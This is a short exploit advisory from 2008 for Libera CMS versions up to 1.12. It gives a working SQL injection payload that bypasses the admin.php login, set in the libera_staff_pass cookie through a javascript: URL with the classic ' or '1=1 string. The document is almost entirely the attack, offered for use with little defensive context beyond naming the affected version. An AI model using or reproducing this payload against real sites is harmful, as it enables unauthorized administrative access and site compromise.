--==+============================================================================+==--
--==+        Libera CMS <= 1.12 Remote SQL Injection Exploit  (Cookie)           +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 10 Sep 2008
 [+] Download: http://downloads.sourceforge.net/liberacms/Libera112.tar.gz?modtime=1209304487&big_mirror=0
 
 [*] Page: admin.php / insert the code javascript and refresh

 [*] Exploit: javascript: document.cookie = "libera_staff_pass=' or '1=1";